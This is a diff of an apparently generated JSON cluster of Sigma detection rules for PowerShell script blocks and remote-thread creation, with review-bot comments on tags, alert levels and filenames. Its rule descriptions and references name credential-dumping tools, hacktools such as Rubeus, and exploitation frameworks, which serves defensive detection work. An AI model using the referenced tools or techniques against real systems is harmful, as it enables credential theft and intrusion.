- "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.2",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness",
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.2",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_acl_service.yml"
],
"tags": [
@@ -29994,6 +29678,30 @@
"uuid": "afd12fed-b0ec-45c9-a13d-aa86625dac81",
"value": "Create Volume Shadow Copy with Powershell"
},
+ {
+ "description": "Detects execution of a PowerShell script that contains calls to the \"Veeam.Backup\" class, in order to dump stored credentials.",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/05/04",
+ "falsepositive": [
+ "Administrators backup scripts (must be investigated)"
+ ],
+ "filename": "posh_ps_veeam_credential_dumping_script.yml",
+ "level": "high",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.pwndefend.com/2021/02/15/retrieving-passwords-from-veeam-backup-servers/",
+ "https://labs.withsecure.com/publications/fin7-target-veeam-servers",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_veeam_credential_dumping_script.yml"
+ ],
+ "tags": [
+ "attack.credential_access"
+ ]
+ },
+ "uuid": "976d6e6f-a04b-4900-9713-0134a353e38b",
+ "value": "Veeam Backup Servers Credential Dumping Script Execution"
+ },
{
"description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.",
"meta": {
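Review bot: this new entry has only a tactic tag (`attack.credential_access`) and therefore no `related` block, unlike the other additions in this patch, which carry a technique id and get a `related-to` link. If the upstream `posh_ps_veeam_credential_dumping_script.yml` rule tags a technique, it should be mirrored here so the entry correlates with the ATT&CK galaxy; if it genuinely has none, that is fine, but the difference is worth a glance before merging.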
@@ -30007,8 +29715,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management",
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_psremoting.yml"
],
"tags": [
@@ -30064,9 +29772,9 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/oroneequalsone/status/1568432028361830402",
"https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md",
+ "https://twitter.com/oroneequalsone/status/1568432028361830402",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml"
],
"tags": [
@@ -30186,9 +29894,9 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
+ "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1",
"https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/",
"https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py",
- "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml"
],
"tags": [
@@ -30256,8 +29964,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso",
"https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml"
],
"tags": [
@@ -30323,8 +30031,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-4---user-discovery-with-env-vars-powershell-script",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_current_user.yml"
],
"tags": [
@@ -30357,8 +30065,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/",
"http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml"
],
"tags": [
@@ -30628,8 +30336,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md",
"https://github.com/harleyQu1nn/AggressorScripts",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_software_discovery.yml"
],
"tags": [
@@ -30759,15 +30467,15 @@
"value": "Suspicious Mount-DiskImage"
},
{
- "description": "Detects keywords that could indicate the use of some PowerShell exploitation framework",
+ "description": "Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework",
"meta": {
- "author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar)",
+ "author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar), Tuan Le (NCSGroup)",
"creation_date": "2019/02/11",
"falsepositive": [
"Unknown"
],
"filename": "posh_ps_susp_keywords.yml",
- "level": "high",
+ "level": "medium",
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
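Review bot: the `level` drop from `high` to `medium` is the one field in this hunk that changes downstream behaviour, since consumers commonly key alert priority on it; the description rewording and the added author are cosmetic. The downgrade should be called out in the commit message alongside the title change in the next hunk, so that anyone relying on the old `high` level for this uuid (`1f49f2ab-26bc-48b3-96cc-dcffbc93eadf`) notices.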
@@ -30792,7 +30500,7 @@
}
],
"uuid": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf",
- "value": "Suspicious PowerShell Keywords"
+ "value": "Potential Suspicious PowerShell Keywords"
},
{
"description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data",
@@ -30841,8 +30549,8 @@
"logsource.product": "windows",
"refs": [
"https://learn.microsoft.com/en-us/windows/wsl/install-on-server",
- "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system",
"https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps",
+ "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_susp_windows_optional_feature.yml"
],
"tags": [
@@ -30898,8 +30606,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy",
"https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml"
],
"tags": [
@@ -30932,8 +30640,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md",
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_start_process.yml"
],
"tags": [
@@ -31108,8 +30816,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a",
"https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_export_pfxcertificate.yml"
],
"tags": [
@@ -31208,10 +30916,10 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/ScumBots/status/1610626724257046529",
- "https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content",
- "https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0",
"https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content",
+ "https://twitter.com/ScumBots/status/1610626724257046529",
+ "https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0",
+ "https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml"
],
"tags": [
@@ -31345,8 +31053,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57",
"https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0",
+ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_download_com_cradles.yml"
],
"tags": "No established tags"
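Review bot: `"tags"` is serialised as the string `"No established tags"` here, whereas every other entry in this file carries an array. Any consumer that iterates over `tags` as a list will break on this entry, so the generator should emit an empty array (or omit the key) when a rule has no tags; the same string value appears again in the `posh_ps_x509enrollment.yml` entry further down.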
@@ -31409,19 +31117,22 @@
"logsource.product": "windows",
"refs": [
"https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1",
- "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1",
- "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
- "https://github.com/calebstewart/CVE-2021-1675",
- "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
- "https://github.com/HarmJ0y/DAMP",
- "https://github.com/samratashok/nishang",
- "https://github.com/DarkCoderSc/PowerRunAsSystem/",
- "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
- "https://github.com/besimorhino/powercat",
- "https://adsecurity.org/?p=2921",
- "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
"https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
"https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html",
+ "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
+ "https://github.com/adrecon/ADRecon",
+ "https://github.com/HarmJ0y/DAMP",
+ "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
+ "https://github.com/calebstewart/CVE-2021-1675",
+ "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1",
+ "https://github.com/samratashok/nishang",
+ "https://github.com/besimorhino/powercat",
+ "https://adsecurity.org/?p=2921",
+ "https://github.com/Kevin-Robertson/Powermad",
+ "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
+ "https://github.com/DarkCoderSc/PowerRunAsSystem/",
+ "https://github.com/adrecon/AzureADRecon",
+ "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
"https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml"
],
@@ -31554,9 +31265,9 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://www.shellhacks.com/clear-history-powershell/",
- "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics",
"https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/",
+ "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics",
+ "https://www.shellhacks.com/clear-history-powershell/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml"
],
"tags": [
@@ -31584,6 +31295,58 @@
"uuid": "bde47d4b-9987-405c-94c7-b080410e8ea7",
"value": "Clearing Windows Console History"
},
+ {
+ "description": "Detects the execution of the hacktool Rubeus using specific command line flags",
+ "meta": {
+ "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)",
+ "creation_date": "2023/04/27",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "posh_ps_hktl_rubeus.yml",
+ "level": "high",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html",
+ "https://github.com/GhostPack/Rubeus",
+ "https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_hktl_rubeus.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003",
+ "attack.t1558.003",
+ "attack.lateral_movement",
+ "attack.t1550.003"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "7b211ac6-c815-4189-93a9-ab415deca926",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "3245cd30-e015-40ff-a31d-5cadd5f377ec",
+ "value": "HackTool - Rubeus Execution - ScriptBlock"
+ },
{
"description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n",
"meta": {
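Review bot: the description on the new Rubeus entry says it matches "specific command line flags", but the logsource is `ps_script` (ScriptBlock logging), so what is actually matched is Rubeus argument text inside logged script blocks, not a process command line; consider wording it as "Rubeus command strings observed in PowerShell script block logs" so analysts do not go looking for it in process_creation telemetry. Also note that `attack.t1003` is the parent technique while the other two tags are sub-techniques; if the upstream rule carries that mix it is fine, but the three `related` entries should be checked against the three technique tags one to one.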
@@ -31705,8 +31468,8 @@
"logsource.product": "windows",
"refs": [
"https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41",
- "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42",
"https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115",
+ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_x509enrollment.yml"
],
"tags": "No established tags"
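Review bot: `"tags": "No established tags"` on the x509enrollment entry is a bare string, while every other entry in this file carries `tags` as an array; a consumer iterating over `tags` will either crash or split the string into characters. Prefer an empty array (`"tags": []`) or omit the key, and check the generator for the other entries that still emit this placeholder string.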
@@ -31969,8 +31732,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md",
"https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_persistence.yml"
],
"tags": [
@@ -31990,41 +31753,6 @@
"uuid": "9e07f6e7-83aa-45c6-998e-0af26efd0a85",
"value": "Powershell WMI Persistence"
},
- {
- "description": "Detects the use of various web request POST or PUT methods (including aliases) via Windows PowerShell command",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/01/07",
- "falsepositive": [
- "Legitimate script"
- ],
- "filename": "posh_ps_upload.yml",
- "level": "medium",
- "logsource.category": "ps_script",
- "logsource.product": "windows",
- "refs": [
- "https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html",
- "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_upload.yml"
- ],
- "tags": [
- "attack.exfiltration",
- "attack.t1020"
- ]
- },
- "related": [
- {
- "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb",
- "value": "Windows PowerShell Upload Web Request"
- },
{
"description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n",
"meta": {
@@ -32309,6 +32037,41 @@
"uuid": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7",
"value": "Invoke-Obfuscation Via Stdin - Powershell"
},
+ {
+ "description": "Detects PowerShell scripts leveraging the \"Invoke-WebRequest\" cmdlet to send data via either \"PUT\" or \"POST\" method.",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/01/07",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "posh_ps_script_with_upload_capabilities.yml",
+ "level": "low",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md",
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2",
+ "https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml"
+ ],
+ "tags": [
+ "attack.exfiltration",
+ "attack.t1020"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb",
+ "value": "PowerShell Script With File Upload Capabilities"
+ },
{
"description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.",
"meta": {
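Review bot: this block keeps the uuid `d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb` of the "Windows PowerShell Upload Web Request" entry removed earlier in the diff, so it is a rename rather than a new rule, but two detection-relevant fields change along with the name: `level` drops from `medium` to `low`, and `falsepositive` goes from `"Legitimate script"` to `"Unknown"`. Those changes affect how downstream consumers prioritise the match and should be called out in the commit message rather than appear as part of a file rename.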
@@ -32375,40 +32138,6 @@
"uuid": "db809f10-56ce-4420-8c86-d6a7d793c79c",
"value": "Potential Defense Evasion Via Raw Disk Access By Uncommon Tools"
},
- {
- "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons",
- "meta": {
- "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community",
- "creation_date": "2018/11/30",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml",
- "level": "high",
- "logsource.category": "create_remote_thread",
- "logsource.product": "windows",
- "refs": [
- "https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f",
- "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cobaltstrike_process_injection.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1055.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42",
- "value": "CobaltStrike Process Injection"
- },
{
"description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n",
"meta": {
@@ -32443,6 +32172,40 @@
"uuid": "f239b326-2f41-4d6b-9dfa-c846a60ef505",
"value": "Password Dumper Remote Thread in LSASS"
},
+ {
+ "description": "Detects uncommon target processes for remote thread creation",
+ "meta": {
+ "author": "Florian Roth (Nextron Systems)",
+ "creation_date": "2022/03/16",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "create_remote_thread_win_uncommon_target_image.yml",
+ "level": "high",
+ "logsource.category": "create_remote_thread",
+ "logsource.product": "windows",
+ "refs": [
+ "https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_uncommon_target_image.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.privilege_escalation",
+ "attack.t1055.003"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "41d9846c-f6af-4302-a654-24bba2729bc6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "a1a144b7-5c9b-4853-a559-2172be8d4a03",
+ "value": "Remote Thread Creation In Uncommon Target Image"
+ },
{
"description": "Detects the creation of a remote thread from a Powershell process in a rundll32 process",
"meta": {
@@ -32451,13 +32214,13 @@
"falsepositive": [
"Unknown"
],
- "filename": "create_remote_thread_win_powershell_crt_rundll32.yml",
+ "filename": "create_remote_thread_win_powershell_susp_targets.yml",
"level": "high",
"logsource.category": "create_remote_thread",
"logsource.product": "windows",
"refs": [
"https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_powershell_crt_rundll32.yml"
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_powershell_susp_targets.yml"
],
"tags": [
"attack.defense_evasion",
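Review bot: the filename is broadened from `create_remote_thread_win_powershell_crt_rundll32.yml` to `create_remote_thread_win_powershell_susp_targets.yml`, yet the surrounding description ("...in a rundll32 process") and the title in the following context line ("Remote Thread Creation Via PowerShell In Rundll32") stay rundll32-specific. Either the upstream rule now covers more targets and the description and value should be regenerated to match, or the rename alone is misleading; please confirm against the upstream rule before merging.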
@@ -32486,131 +32249,22 @@
"value": "Remote Thread Creation Via PowerShell In Rundll32"
},
{
- "description": "Detects remote thread injection events based on action seen used by bumblebee",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2022/09/27",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "create_remote_thread_win_bumblebee.yml",
- "level": "high",
- "logsource.category": "create_remote_thread",
- "logsource.product": "windows",
- "refs": [
- "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_bumblebee.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.execution",
- "attack.t1218.011",
- "attack.t1059.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "994cac2b-92c2-44bf-8853-14f6ca39fbda",
- "value": "Bumblebee Remote Thread Creation"
- },
- {
- "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"",
- "meta": {
- "author": "oscd.community, Natalia Shornikova",
- "creation_date": "2020/10/06",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml",
- "level": "high",
- "logsource.category": "create_remote_thread",
- "logsource.product": "windows",
- "refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "fb656378-f909-47c1-8747-278bf09f4f4f",
- "value": "Potential Credential Dumping Attempt Via PowerShell Remote Thread"
- },
- {
- "description": "Detects a remote thread creation in suspicious target images",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2022/03/16",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "create_remote_thread_win_susp_targets.yml",
- "level": "high",
- "logsource.category": "create_remote_thread",
- "logsource.product": "windows",
- "refs": [
- "https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_targets.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.privilege_escalation",
- "attack.t1055.003"
- ]
- },
- "related": [
- {
- "dest-uuid": "41d9846c-f6af-4302-a654-24bba2729bc6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "a1a144b7-5c9b-4853-a559-2172be8d4a03",
- "value": "Remote Thread Creation in Suspicious Targets"
- },
- {
- "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity",
+ "description": "Detects remote thread creation in \"KeePass.exe\" which could indicates potential password dumping activity",
"meta": {
"author": "Timon Hackenjos",
